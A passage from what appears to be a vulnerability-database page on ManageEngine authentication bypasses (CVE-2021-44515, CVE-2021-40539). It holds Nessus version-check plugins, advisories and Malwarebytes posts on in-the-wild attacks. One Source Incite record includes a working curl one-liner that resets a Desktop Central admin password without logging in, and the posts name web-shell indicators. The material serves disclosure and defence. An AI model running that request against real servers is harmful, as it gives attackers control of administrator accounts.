  script_set_attribute(attribute:"vuln_publication_date", value:"2021/12/03");
  script_set_attribute(attribute:"patch_publication_date", value:"2021/12/03");
  script_set_attribute(attribute:"plugin_publication_date", value:"2021/12/06");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:zohocorp:manageengine_desktop_central");
  script_set_attribute(attribute:"stig_severity", value:"I");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Windows");

  script_copyright(english:"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("manageengine_desktop_central_installed.nbin");
  script_require_keys("installed_sw/ManageEngine Desktop Central");

  exit(0);
}

include('vcf.inc');

var app_info = vcf::get_app_info(app:'ManageEngine Desktop Central', win_local:TRUE);

var constraints = [
  {'fixed_version':'10.1.2127.18'},
  {'min_version':'10.1.2128.0', 'fixed_version':'10.1.2137.3'}
];

vcf::check_version_and_report(
  app_info:app_info,
  constraints:constraints,
  severity:SECURITY_HOLE
);
```

Unlike the CVE-2021-44757 plugin, this one is marked `exploit_available` and `exploited_by_malware`, carries a CISA-KNOWN-EXPLOITED cross-reference dated 2021/12/24, and reports at SECURITY_HOLE rather than SECURITY_WARNING.

*Plugin 153147: ManageEngine ADSelfService Plus < build 6114 REST API Authentication Bypass (CVE-2021-40539).* Remote check, plugin file MANAGEENGINE_ADSELFSERVICE_6114.NASL, version 1.9, published 2021-09-08, modified 2022-03-08, last seen 2022-06-22T18:04:07, CPE cpe:/a:zohocorp:manageengine_adselfservice_plus, [https://www.tenable.com/plugins/nessus/153147](<https://www.tenable.com/plugins/nessus/153147>). CVSS v3.0 base 9.8 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H); CVSS v2 base 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P). Description: "According to its self-reported version, the ManageEngine ADSelfService Plus application running on the remote host is prior to build 6114. It is, therefore, affected by an authentication bypass vulnerability affecting REST API URLs. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary code. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported build number." Plugin source:

```nasl
#%NASL_MIN_LEVEL 70300
##
# (C) Tenable Network Security, Inc.
##

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(153147);
  script_version("1.9");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/03/08");

  script_cve_id("CVE-2021-40539");
  script_xref(name:"CISA-KNOWN-EXPLOITED", value:"2021/11/17");
  script_xref(name:"IAVA", value:"2021-A-0561");

  script_name(english:"ManageEngine ADSelfService Plus < build 6114 REST API Authentication Bypass");

  script_set_attribute(attribute:"synopsis", value:
"A web application is affected by an authentication bypass vulnerability.");
  script_set_attribute(attribute:"description", value:
"According to its self-reported version, the ManageEngine ADSelfService Plus application running on the remote host is
prior to build 6114. It is, therefore, affected by an authentication bypass vulnerability affecting REST API URLs. An
unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary code.

Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported build
number.");
  # https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?74285241");
  script_set_attribute(attribute:"solution", value:
"Upgrade to ManageEngine ADSelfService Plus build 6114 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2021-40539");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'ManageEngine ADSelfService Plus CVE-2021-40539');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2021/09/07");
  script_set_attribute(attribute:"patch_publication_date", value:"2021/09/07");
  script_set_attribute(attribute:"plugin_publication_date", value:"2021/09/08");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:zohocorp:manageengine_adselfservice_plus");
  script_set_attribute(attribute:"stig_severity", value:"I");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("manageengine_adselfservice_detect.nasl");
  script_require_keys("installed_sw/ManageEngine ADSelfService Plus");
  script_require_ports("Services/www", 8888);

  exit(0);
}

include('vcf.inc');
include('vcf_extras_zoho.inc');
include('http.inc');

var app, app_info, constraints, port;

app = 'ManageEngine ADSelfService Plus';

# Exit if app is not detected on this http port
port = get_http_port(default:8888);

app_info = vcf::zoho::fix_parse::get_app_info(
  app: app,
  port: port,
  webapp: TRUE
);

constraints = [
  { 'fixed_version':'6114', 'fixed_display':'build 6114'}
];

vcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);
```

*Plugin 153636: ManageEngine Log360 < Build 5229 REST API Restriction Bypass RCE (CVE-2021-40539).* Compiled plugin (MANAGEENGINE_LOG360_CVE-2021-40539.NBIN; no source published), published 2021-09-24, modified 2022-08-15, last seen 2022-08-15T22:26:11, CPE cpe:/a:zohocorp:manageengine_log360, [https://www.tenable.com/plugins/nessus/153636](<https://www.tenable.com/plugins/nessus/153636>). CVSS v3.0 base 9.8 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H); CVSS v2 base 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P). Description: "The ManageEngine Log360 running on the remote host is affected by a security restriction bypass vulnerability due to improper validation of user-supplied data. An unauthenticated, remote attacker can exploit this, via a specially crafted message, to execute arbitrary code on the remote host."

*Plugin 153848: ManageEngine EventLog Analyzer < Build 12201 REST API Restriction Bypass RCE (CVE-2021-40539).* Compiled plugin (MANAGEENGINE_EVENTLOG_ANALYZER_CVE-2021-40539.NBIN; no source published), published 2021-10-04, modified 2022-08-15, last seen 2022-08-16T00:20:39, CPE cpe:/a:zohocorp:manageengine_eventlog_analyzer, [https://www.tenable.com/plugins/nessus/153848](<https://www.tenable.com/plugins/nessus/153848>). CVSS v3.0 base 9.8 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H); CVSS v2 base 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P). Description: "The ManageEngine EventLog Analyzer running on the remote host is affected by a security restriction bypass vulnerability due to improper validation of user-supplied data. An unauthenticated, remote attacker can exploit this, via a specially crafted message, to execute arbitrary code on the remote host."

*Plugin 154964: ManageEngine ADSelfServicePlus Authentication Bypass (CVE-2021-40539).* Compiled plugin (MANAGEENGINE_ADSELFSERVICE_PLUS_CVE-2021-40539.NBIN; no source published), published 2021-11-08, modified 2022-08-15, last seen 2022-08-15T22:27:44, CPE cpe:/a:zohocorp:manageengine_adselfservice_plus, [https://www.tenable.com/plugins/nessus/154964](<https://www.tenable.com/plugins/nessus/154964>). CVSS v3.0 base 9.8 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H); CVSS v2 base 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P). Description: "The Zoho ManageEngine ADSelfService Plus running on the remote host is affected by an authentication bypass vulnerability in the REST API which can lead to remote code execution."

**AttackerKB:**

*CVE-2021-44515* (AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12, [https://attackerkb.com/topics/rJw4DFI2RQ/cve-2021-44515](<https://attackerkb.com/topics/rJw4DFI2RQ/cve-2021-44515>)), published 2022-01-21, modified 2022-01-21, last seen 2022-01-21T20:28:26. CVSS v3.1 base 9.8, Critical (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H; exploitability subscore 3.9, impact subscore 5.9). CVSS v2 base 10.0, High (AV:N/AC:L/Au:N/C:C/I:C/A:C; exploitability subscore 10.0, impact subscore 10.0). Description: "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3."

Recent assessments:

**wvu-r7** at January 14, 2022 9:36am UTC reported: Please see the [Rapid7 analysis](<https://attackerkb.com/topics/rJw4DFI2RQ/cve-2021-44515/rapid7-analysis>).

Assessed Attacker Value: 5, 5, 4.

*CVE-2021-40539* (AKB:DEB21742-F92B-4F5A-931C-082502383C34, [https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539>)), published 2021-09-07, modified 2021-09-15, last seen 2022-01-18T20:31:26. CVSS v3.1 base 9.8, Critical (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H; exploitability subscore 3.9, impact subscore 5.9). CVSS v2 base 7.5, High (AV:N/AC:L/Au:N/C:P/I:P/A:P; exploitability subscore 10.0, impact subscore 6.4). Description: "Zoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution."

Recent assessments:

**wvu-r7** at September 15, 2021 8:54am UTC reported: Please see the [Rapid7 analysis](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis>). **Update:** I have confirmed that ADManager Plus was also patched against CVE-2021-40539. See the [release notes](<https://www.manageengine.com/products/ad-manager/release-notes.html>) for build 7112. This doesn't seem to affect `/RestAPI/WC` endpoints.

**ccondon-r7** at November 08, 2021 3:18pm UTC reported: Please see the [Rapid7 analysis](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis>). **Update:** I have confirmed that ADManager Plus was also patched against CVE-2021-40539. See the [release notes](<https://www.manageengine.com/products/ad-manager/release-notes.html>) for build 7112. This doesn't seem to affect `/RestAPI/WC` endpoints.

Assessed Attacker Value: 5, 5, 5.

**Check Point advisories:**

*CPAI-2021-1110: Zoho ManageEngine Desktop Central Authentication Bypass (CVE-2021-44515).* Published 2022-03-16, modified 2022-03-16, last seen 2022-03-16T15:30:13 (no link given). CVSS v3.1 base 9.8, Critical (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H; exploitability 3.9, impact 5.9); CVSS v2 base 10.0, High (AV:N/AC:L/Au:N/C:C/I:C/A:C; exploitability 10.0, impact 10.0). Description: "An authentication bypass vulnerability exists in Zoho ManageEngine Desktop Central. Successful exploitation of this vulnerability would allow remote attackers to obtain sensitive information and gain unauthorized access into the affected system."

*CPAI-2021-0879: Zoho ManageEngine ADSelfService Plus Authentication Bypass (CVE-2021-40539).* Published 2021-11-14, modified 2021-11-14, last seen 2022-02-16T19:31:30 (no link given). CVSS v3.1 base 9.8, Critical (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H; exploitability 3.9, impact 5.9); CVSS v2 base 7.5, High (AV:N/AC:L/Au:N/C:P/I:P/A:P; exploitability 10.0, impact 6.4). Description: "An authentication bypass vulnerability exists in Zoho ManageEngine ADSelfService Plus. Successful exploitation of this vulnerability would allow remote attackers to gain unauthorized access into the affected system."

**CISA Known Exploited Vulnerabilities:**

*CISA-KEV-CVE-2021-44515: Zoho Desktop Central Authentication Bypass Vulnerability.* Published 2021-12-10, modified 2021-12-10, last seen 2022-08-10T17:26:47. CVSS v3.1 base 9.8, Critical (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H; exploitability 3.9, impact 5.9); CVSS v2 base 10.0, High (AV:N/AC:L/Au:N/C:C/I:C/A:C; exploitability 10.0, impact 10.0). Description: "Zoho Desktop Central contains an authentication bypass vulnerability that could allow an attacker to execute arbitrary code in the Desktop Central MSP server."

*CISA-KEV-CVE-2021-40539: Zoho Corp. ManageEngine ADSelfService Plus Version 6113 and Earlier Authentication Bypass.* Published 2021-11-03, modified 2021-11-03, last seen 2022-08-10T17:26:47. CVSS v3.1 base 9.8, Critical (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H; exploitability 3.9, impact 5.9); CVSS v2 base 7.5, High (AV:N/AC:L/Au:N/C:P/I:P/A:P; exploitability 10.0, impact 6.4). Description: "Zoho ManageEngine ADSelfService Plus versions 6113 and earlier contain an authentication bypass vulnerability which allows for Remote Code Execution."

Note that none of the records above list CVE-2021-44757, the bug the article is about, in CISA's catalog or in AttackerKB; the exploited-in-the-wild entries are for the earlier Desktop Central bypass (CVE-2021-44515) and the ADSelfService Plus REST API bypass (CVE-2021-40539).

**Source Incite:**

"srcincite": [{"lastseen": "2022-02-27T09:44:51", "description": "**Vulnerability Details:**\n\nThis vulnerability allows remote attackers to bypass authentication on affected installations of ManageEngine Desktop Central. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the StateFilter class. The issue results from an arbitrary forward during request handling. An attacker can leverage this vulnerability to bypass authentication on the system and reset the administrators password.\n\n**Affected Vendors:**\n\nZoho\n\n**Affected Products:**\n\nManageEngine Desktop Central and ManageEngine Desktop Central MSP <= 10.1.2137.2\n\n**Vendor Response:**\n\nZoho has issued an update to correct this vulnerability. 
More details can be found at: <https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-12T00:00:00", "type": "srcincite", "title": "SRC-2022-0001 : Zoho ManageEngine Desktop Central StateFilter Arbitrary Forward Authentication Bypass Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44515"], "modified": "2022-01-21T00:00:00", "id": "SRC-2022-0001", "href": "https://srcincite.io/advisories/src-2022-0001/", "sourceData": "curl -kb \"STATE_COOKIE=&_REQS/_TIME/1337\" \"https://target.tld:8383/STATE_ID/1337/changeDefaultAmazonPassword?loginName=admin&newUserPassword=haxed\" -d \"\"", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": ""}], "malwarebytes": [{"lastseen": "2021-09-17T14:35:09", "description": "In a [joint advisory](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>) the FBI, the United States Coast Guard Cyber Command (CGCYBER), and the Cybersecurity and Infrastructure Security Agency (CISA) warn that advanced 
persistent threat (APT) cyber-actors may be exploiting a vulnerability in ManageEngine's single sign-on (SSO) solution.\n\n### The vulnerability\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). The vulnerability in question is listed under [CVE-2021-40539](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539>) as a REST API authentication bypass with resultant remote code execution (RCE) in Zoho ManageEngine ADSelfService Plus version 6113 and prior.\n\nThe vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request. This would allow attackers to carry out subsequent attacks resulting in RCE.\n\nFor those that have never heard of this software, it's a self-service password management and single sign-on (SSO) solution for Active Directory (AD) and cloud apps. Which means that any attacker that is able to exploit this vulnerability immediately has access to some of the most critical parts of a corporate network.\n\n### In-the-wild exploitation\n\nWhen [word of the vulnerability came out](<https://threatpost.com/zoho-password-manager-zero-day-attack/169303/>) it was already clear that it was being exploited in the wild. Zoho remarked that it was noticing indications of this vulnerability being exploited. Other [researchers](<https://twitter.com/voodoodahl1/status/1435673340539281410>) chimed in saying the attacks had thus far been highly targeted and limited, and possibly the work of a single threat-actor. Yesterday's joint advisory seems to support that, telling us that APT cyber-actors are likely among those exploiting the vulnerability. \n\nThey find this of high concern since this poses a serious risk to critical infrastructure companies. 
CISA recognizes [16 critical infrastructure sectors](<https://www.cisa.gov/critical-infrastructure-sectors>) whose "assets, systems, and networks, whether physical or virtual, are considered so vital to the United States that their incapacitation or destruction would have a debilitating effect on security, national economic security, national public health or safety, or any combination thereof."\n\nThe joint advisory points out that the suspected APT cyber-actors have targeted academic institutions, defense contractors, and critical infrastructure entities in multiple industry sectors\u2014including transportation, IT, manufacturing, communications, logistics, and finance.\n\nIt also warns that successful exploitation of the vulnerability allows an attacker to place web shells, which enable the adversary to conduct post-exploitation activities, such as compromising administrator credentials, conducting lateral movement, and exfiltrating registry hives and Active Directory files.\n\nAccording to the advisory, the JavaServer Pages web shell arrives as a `.zip` file "masquerading as an x509 certificate" called `service.cer`. The web shell is then accessed via the URL path `/help/admin-guide/Reports/ReportGenerate.jsp`. \n\nHowever, it warns:\n\n> Confirming a successful compromise of ManageEngine ADSelfService Plus may be difficult\u2014the attackers run clean-up scripts designed to remove traces of the initial point of compromise and hide any relationship between exploitation of the vulnerability and the web shell.\n\nPlease consult the advisory for a [full list of IOCs](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>).\n\n### Mitigation\n\nA patch for this vulnerability was made available on September 7, 2021. Users are advised to update to ADSelfService Plus build 6114. 
The FBI, CISA, and CGCYBER also strongly urge organizations to make sure that ADSelfService Plus is not directly accessible from the Internet.\n\nThe [ManageEngine site](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>) has specific instructions on how to identify and update vulnerable installations. It also has information about how you can reach out to support if you need further information, have any questions, or face any difficulties updating ADSelfService Plus.\n\nStay safe, everyone!\n\nThe post [FBI and CISA warn of APT groups exploiting ADSelfService Plus](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-17T13:48:46", "type": "malwarebytes", "title": "FBI and CISA warn of APT groups exploiting ADSelfService Plus", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40539"], "modified": "2021-09-17T13:48:46", "id": "MALWAREBYTES:B6DA5FE033D50131FABF027A2BB04385", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-21T11:57:15", "description": "Businesses and governments these days are relying on dozens of different Software-as-a-Service (SaaS) applications to run their operations \u2014 and it\u2019s no secret that hackers are always looking for security vulnerabilities in them to exploit.\n\nAccording to [research by BetterCloud](<http://pages.bettercloud.com/rs/719-KZY-706/images/2020_StateofSaaSOpsReport.pdf?mkt_tok=NzE5LUtaWS03MDYAAAF8LQdmoC7u54xbqxNwp0au4Zk7SiYaaqq2vupXFxCvaP5vY8gSQtlGFsUsRI8oj5Fl2m5PwIZUUAlzVZL_-hUEQ2RdNqgEzDAmZA5bZtowS_v-zMs>), the average company with 500 to 999 employees uses about 
93 different SaaS applications, with that number rising to 177 for companies with over 1000 employees.\n\nCoupled with the fact that vendors release thousands of updates each year to patch security vulnerabilities in their software, it\u2019s not surprising that businesses and governments are struggling to keep up with the [volume of security vulnerabilities and patches](<https://media.bitpipe.com/io_15x/io_152272/item_2184126/ponemon-state-of-vulnerability-response-.pdf>).\n\nAnd lo and behold, despite the best efforts of governments and businesses around the globe, hackers still managed to exploit [multiple security vulnerabilities in 2021](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021/>).\n\nIn this post, we\u2019ll take a look at five times governments and businesses got hacked thanks to security vulnerabilities in 2021.\n\n## 1\\. APT41 exploits Log4Shell vulnerability to compromise at least two US state governments\n\nFirst publicly announced in early December 2021, [Log4shell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/12/what-smbs-can-do-to-protect-against-log4shell-attacks/>) ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>)) is a critical security vulnerability in the popular Java library Apache Log4j 2. 
The vulnerability is simple to execute and enables attackers to perform [remote code execution](<https://blog.malwarebytes.com/glossary/remote-code-execution-rce-attack/>).\n\nA patch for Log4Shell was released on 9 December 2021, but within hours of the initial December 10 2021 announcement, hacker groups were already racing to exploit Log4Shell before businesses and governments could patch it \u2014 and at least one of them was successful.\n\nShortly after the advisory, the Chinese state-sponsored hacking group APT41 exploited Log4Shell to compromise at least two US state governments, according to research from [Mandiant](<https://www.mandiant.com/resources/apt41-us-state-governments>). Once they gained access to internet-facing systems, APT41 began a months-long campaign of [reconnaissance](<https://blog.malwarebytes.com/glossary/recon/>) and credential harvesting.\n\n## 2. North Korean government-backed groups exploit Chrome zero-day vulnerability\n\nOn February 10 2022, Google's Threat Analysis Group (TAG) [discovered that two North Korean government-backed groups](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/02/update-now-chrome-patches-actively-exploited-zero-day-vulnerability/>) exploited a vulnerability ([**CVE-2022-0609**](<https://nvd.nist.gov/vuln/detail/CVE-2022-0609>)) in Chrome to attack over 250 individuals working for various media, fintech, and software companies.\n\nThe activities of the two groups have been tracked as [Operation Dream Job](<https://www.clearskysec.com/operation-dream-job/>) and [AppleJeus](<https://securelist.com/operation-applejeus/87553/>), and both of them used the same [exploit kit](<https://blog.malwarebytes.com/threats/exploit-kits/>) to collect sensitive information from affected systems.\n\nHow does it work, you ask? 
Well, hackers exploited a use-after-free (UAF) vulnerability in the Animation component of Chrome \u2014 which, just like Log4Shell, allows hackers to perform remote code execution.\n\n## 3. Hackers infiltrate governments and companies with ManageEngine ADSelfService Plus vulnerability\n\nFrom September 17 through early October, hackers successfully compromised at least nine companies and 370 servers by [exploiting a vulnerability](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/>) ([**CVE-2021-40539**](<https://nvd.nist.gov/vuln/detail/cve-2021-40539>)) [in ManageEngine ADSelfService Plus](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/>), a self-service password management and single sign-on solution.\n\nSo, what happens after hackers exploit this vulnerability? You guessed it \u2014 remote code execution. Specifically, hackers uploaded a [payload](<https://blog.malwarebytes.com/glossary/payload/>) to a victim's network that installed a webshell, a malicious script that grants hackers a persistent gateway to the affected device.\n\nFrom there, hackers [moved laterally](<https://blog.malwarebytes.com/glossary/lateral-movement/>) to other systems on the network, exfiltrated any files they pleased, and [even stole credentials](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>).\n\n## 4. 
Tallinn-based hacker exploits Estonian government platform security vulnerabilities\n\n[In July 2021](<https://www.ria.ee/en/news/police-and-border-guard-board-and-information-system-authority-stopped-illegal-downloading-data.html>), Estonian officials announced that a Tallinn-based male had gained access to KMAIS, Estonia\u2019s ID-document database, where he downloaded the government ID photos of 286,438 Estonians.\n\nTo do this, the hacker exploited a vulnerability in KMAIS that allowed him to obtain a person's ID photo using queries. Specifically, KMAIS did not sufficiently check the validity of the query received \u2014 and so, using fake digital certificates, the suspect could download the photograph of whoever he was pretending to be.\n\n## 5. Russian hackers exploit Kaseya security vulnerabilities\n\nKaseya, a Miami-based software company, provides tech services to thousands of businesses over the world \u2014 and on July 2 2021, Kaseya CEO Fred Voccola had an urgent message for Kaseya customers: [shut down your servers immediately](<https://www.zdnet.com/article/updated-kaseya-ransomware-attack-faq-what-we-know-now/>).\n\nThe urgency was warranted. [Over 1,500 small and midsize businesses](<https://blog.malwarebytes.com/cybercrime/2021/07/shutdown-kaseya-vsa-servers-now-amidst-cascading-revil-attack-against-msps-clients/>) had just been attacked, with attackers asking for $70 million in payment.\n\nA Russian-based cybergang known as REvil claimed responsibility for the attack. 
According to Huntress Labs, REvil [exploited a zero-day](<https://www.cisa.gov/uscert/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa>) ([CVE-2021-30116](<https://nvd.nist.gov/vuln/detail/CVE-2021-30116>)) and performed an authentication bypass in Kaseya's web interface \u2014 allowing them to deploy [a ransomware attack](<https://blog.malwarebytes.com/ransomware/2021/07/3-things-the-kaseya-attack-can-teach-us-about-ransomware-recovery/>) on MSPs and their customers.\n\n## Organizations need a streamlined approach to vulnerability assessment\n\n[Hackers took advantage](<https://blog.malwarebytes.com/hacking-2/2022/05/10-ways-attackers-gain-access-to-networks/>) of many security vulnerabilities in 2021 to breach an array of governments and businesses.\n\nAs we broke down in this article, hackers can range from individuals to whole state-sponsored groups \u2014 and we also saw how vulnerabilities themselves can appear in just about any piece of software regardless of the industry.\n\nAnd while some vulnerabilities are certainly worse than others, the sheer volume of vulnerabilities out there makes it difficult to keep up with the volume of security patches. With the right [vulnerability management](<https://www.malwarebytes.com/cybersecurity/business/what-is-vulnerability-management>) and [patch management](<https://www.malwarebytes.com/cybersecurity/business/what-is-patch-management>), however, your organization can find (and correct) weak points that malicious hackers, viruses, and other cyberthreats want to attack.\n\nWant to learn more about different vulnerability and patch management tools? 
Visit our [Vulnerability and Patch Management page](<https://www.malwarebytes.com/business/vulnerability-patch-management>) or read the [solution brief](<https://www.malwarebytes.com/resources/easset_upload_file46277_212091_e.pdf>).\n\nThe post [Security vulnerabilities: 5 times that organizations got hacked](<https://blog.malwarebytes.com/business-2/2022/06/security-vulnerabilities-5-times-that-organizations-got-hacked/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-06-21T10:04:02", "type": "malwarebytes", "title": "Security vulnerabilities: 5 times that organizations got hacked", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116", "CVE-2021-40539", "CVE-2021-44228", "CVE-2022-0609"], "modified": "2022-06-21T10:04:02", "id": "MALWAREBYTES:4CB01833826116B2823401DFB69A5431", "href": "https://blog.malwarebytes.com/business-2/2022/06/security-vulnerabilities-5-times-that-organizations-got-hacked/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-29T18:23:40", 
"description": "A joint Cybersecurity Advisory, coauthored by cybersecurity authorities of the United States (CISA, NSA, and FBI), Australia (ACSC), Canada (CCCS), New Zealand (NZ NCSC), and the United Kingdom (NCSC-UK) has detailed the top 15 Common Vulnerabilities and Exposures (CVEs) routinely exploited by malicious cyber actors in 2021, as well as other CVEs frequently exploited.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). These are the CVEs that made it into the top 10.\n\n## 1\\. Log4Shell\n\n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>), commonly referred to as [Log4Shell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend/>) or Logjam. This was a software flaw in the Apache Log4j logging utility. A logger is a piece of software that logs every event that happens in a computer system. The records it produces are useful for IT and security folks to trace errors or check any abnormal behavior within a system.\n\nWhen Log4Shell emerged in December 2021, what caught many by surprise was the enormous number of applications and web services, including those offered by Twitter, Apple, Google, Amazon, Steam, and Microsoft, among others, that were relying on Log4j, many of which inherited the vulnerability.\n\nThis made for an exceptionally broad attack surface. Combine that with an incredibly easy to use exploit and there should be no surprise that this vulnerability made it to the top of the 